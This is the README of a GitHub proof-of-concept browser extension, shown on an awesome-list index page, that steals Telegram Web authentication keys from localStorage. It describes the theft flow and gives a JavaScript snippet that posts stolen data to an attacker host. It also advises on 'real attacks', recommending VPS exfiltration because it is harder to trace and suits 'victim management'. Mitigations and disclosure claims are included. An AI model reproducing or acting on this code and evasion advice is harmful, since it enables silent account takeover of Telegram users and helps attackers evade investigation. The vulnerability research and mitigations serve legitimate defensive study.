Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/right-git/telegram-extension-vulneribility

Telegram localStorage Security Vulnerability Proof-of-Concept
https://github.com/right-git/telegram-extension-vulneribility

hacking-telegram telegram telegram-hack telegram-vulneribility

Last synced: 6 months ago
JSON representation

Telegram localStorage Security Vulnerability Proof-of-Concept

Awesome Lists containing this project

README 

          
# Telegram localStorage Security Vulnerability Proof-of-Concept



[![Video Demo](https://img.youtube.com/vi/HvfHwf79CzU/maxresdefault.jpg)](https://www.youtube.com/watch?v=HvfHwf79CzU)



## ⚠️ SECURITY RESEARCH DISCLOSURE



**This proof-of-concept is created for educational and security research purposes only. It demonstrates a critical security vulnerability that affects Telegram Web and potentially thousands of other web applications.**



## 🔍 Vulnerability Overview



### The Problem

Browser extensions have unrestricted access to `localStorage` data from any website without requiring explicit user permission. This creates a critical security vulnerability for web applications that store sensitive authentication data in browser localStorage.



### Impact on Telegram

Telegram Web (web.telegram.org) stores authentication tokens and session data in the browser's localStorage, making it vulnerable to data extraction by malicious browser extensions. This affects millions of Telegram users who use the web version.



## 🎯 Attack Vector Demonstration



This extension demonstrates how a malicious actor could:



1. **Distribute a seemingly innocent browser extension** (disguised as a productivity tool, ad blocker, etc.)

2. **Automatically detect when users visit Telegram Web**

3. **Extract authentication tokens from localStorage** without any user interaction

4. **Exfiltrate the stolen data** to attacker-controlled servers

5. **Gain complete account access** using the stolen authentication data



## 📋 Technical Details



### Authentication Data at Risk

The extension specifically targets these critical Telegram authentication keys:

- `dc1_auth_key` - Data Center 1 authentication key

- `dc2_auth_key` - Data Center 2 authentication key  

- `dc3_auth_key` - Data Center 3 authentication key

- `dc4_auth_key` - Data Center 4 authentication key



### Attack Flow

```

User installs malicious extension → 

Extension monitors for web.telegram.org → 

User logs into Telegram Web → 

Extension extracts localStorage data → 

Data is exfiltrated to attacker's server → 

Attacker gains account access

```



## 🔧 Proof-of-Concept Components



### Files Structure

```

├── manifest.json     # Extension configuration and permissions

├── background.js     # Service worker for tab management

├── content.js        # Main attack logic and data extraction

└── README.md         # This documentation

```



## ⚠️ Implementation Considerations



### Data Exfiltration Method



**This proof-of-concept uses Telegram Bot API for demonstration purposes only.** In real-world attacks, this approach has significant security drawbacks:



#### Why Telegram is NOT Recommended for Real Attacks:

- **🚨 Exposes Bot Token** - Hardcoded bot tokens can be discovered through reverse engineering

- **🚨 Reveals Chat ID** - Links attacks to specific Telegram accounts

- **🚨 Telegram Monitoring** - Telegram may detect and block suspicious bot activity

- **🚨 Rate Limiting** - Telegram API has strict rate limits for file uploads

- **🚨 Forensic Evidence** - Leaves clear audit trails in Telegram's systems



#### Recommended Alternative: VPS Server Exfiltration



For educational understanding of real attack vectors, a more sophisticated approach would use:



```javascript

// Example: Secure VPS endpoint (NOT included in this PoC)

const exfiltrateToVPS = (data) => {

  fetch('https://attacker-vps.example.com/collect', {

    method: 'POST',

    headers: {

      'Content-Type': 'application/json',

      'X-Session': btoa(Date.now() + Math.random()), // Basic obfuscation

    },

    body: JSON.stringify({

      target: window.location.hostname,

      timestamp: Date.now(),

      data: data

    })

  });

};

```



#### Advantages of VPS Approach:

- ✅ **No hardcoded credentials** in extension code

- ✅ **Anonymous collection** without platform dependencies

- ✅ **Custom encryption** and obfuscation capabilities

- ✅ **No rate limits** or platform restrictions

- ✅ **Harder to trace** and investigate

- ✅ **Professional data organization** and victim management



**Note:** This information is provided for security research and defensive understanding only. The current Telegram-based implementation serves as an easily demonstrable proof-of-concept while maintaining ethical boundaries.



### Key Functions



#### `getAuthData()`

- Extracts all localStorage key-value pairs from the current domain

- Demonstrates unrestricted access to sensitive data



#### `sendMessage()`

- Simulates data exfiltration to attacker's endpoint

- Uses Telegram Bot API for demonstration purposes

- Shows how stolen data would be transmitted



#### Main Attack Loop

- Monitors Telegram Web activity every 5 seconds

- Waits for authentication keys to be present

- Prevents duplicate data extraction

- Automatically exfiltrates data when conditions are met



## 🚀 Installation & Testing



### Prerequisites

- Google Chrome or Chromium-based browser

- Developer mode enabled in Chrome extensions



### Setup Instructions

1. Clone or download this repository

2. Open Chrome and navigate to `chrome://extensions/`

3. Enable "Developer mode" in the top right

4. Click "Load unpacked" and select this directory

5. Navigate to https://web.telegram.org

6. Log into your Telegram account

7. Open browser console to see PoC logs



### Expected Behavior

- Extension automatically activates on Telegram Web

- Console logs show detection of authentication data

- Data extraction is demonstrated (sent to configured endpoint)



## 🎥 Video Demonstration



### Live Attack Demo

Watch the complete vulnerability demonstration on YouTube:



**🔗 [View Demo Video](https://www.youtube.com/watch?v=HvfHwf79CzU)**



⚠️ *The video demonstrates the attack for educational purposes only with proper disclaimers*



### What the Demo Shows:

- Real-time localStorage data extraction from Telegram Web

- Silent authentication token theft without user knowledge

- Complete attack flow from extension installation to data exfiltration

- Console logs showing each step of the vulnerability exploitation



## 📊 Vulnerability Assessment



### Severity: **CRITICAL**



**CVSS 3.1 Score: 9.6 (Critical)**

- **Attack Vector:** Network (AV:N)

- **Attack Complexity:** Low (AC:L)  

- **Privileges Required:** None (PR:N)

- **User Interaction:** Required (UI:R) - Only to install extension

- **Scope:** Changed (S:C)

- **Confidentiality Impact:** High (C:H)

- **Integrity Impact:** High (I:H)

- **Availability Impact:** High (A:H)



### Why This is Critical

1. **No Additional Permissions Required** - Extensions can access localStorage without declaring special permissions

2. **Silent Attack** - Users have no indication their data is being extracted

3. **Persistent Access** - Once tokens are stolen, attacker maintains account access

4. **Wide Attack Surface** - Affects any user who installs malicious extensions

5. **Complete Account Compromise** - Stolen tokens provide full account access



## 🛡️ Recommended Mitigations



### For Telegram

1. **Move sensitive data to secure storage**

   - Implement secure HTTP-only cookies for web applications



2. **Implement token rotation**

   - Shorter-lived authentication tokens

   - Regular token refresh mechanisms

   - Session invalidation on suspicious activity



3. **Add integrity checks**

   - Detect unauthorized localStorage access

   - Implement client-side monitoring for data exfiltration

   - Alert users of potential compromise



### For Users

1. **Review extension permissions in manifest** before installation

2. **Only install extensions from trusted sources**

3. **Regularly audit installed extensions**



### For Browser Vendors

1. **Require explicit permission** for localStorage access in extensions

2. **Implement localStorage access logging** for transparency

3. **Add user controls** for localStorage sharing with extensions

4. **Develop APIs** for secure extension-to-page communication



## 📝 Responsible Disclosure



This vulnerability has been:

- ✅ Sent report to Telegram email for Bug Bounty Reward and Google Chrome Bug Bounty

- ✅ Identified through legitimate security research

- ✅ Documented with proof-of-concept code

- ✅ Prepared for responsible disclosure to Telegram

- ✅ Created for educational purposes only



## ⚖️ Legal & Ethical Considerations



### Disclaimer

- This code is for **educational and research purposes only**

- **Do not use** this code for malicious activities

- **Do not target** unauthorized accounts or systems

- The author assumes **no responsibility** for misuse of this code



### Research Ethics

This research follows responsible disclosure principles:

- No real user data was compromised during research

- No unauthorized access was attempted

- Code is shared to raise awareness and improve security

- Telegram will be notified through proper security channels



## 📧 Contact & Follow



### Security Research Updates

For the latest security research and vulnerability disclosures:



**📱 Telegram Channel: [Right Decision IT](https://t.me/right_decision_it)**



### Contact Information

For questions about this security research or responsible disclosure:

- **Security Research Purpose Only**

- **No malicious use intended**

- **Educational demonstration only**



Follow my security research for more vulnerability disclosures and educational content!



---



**⚠️ Remember: This tool demonstrates a serious security vulnerability. Use responsibly and only for legitimate security research purposes.**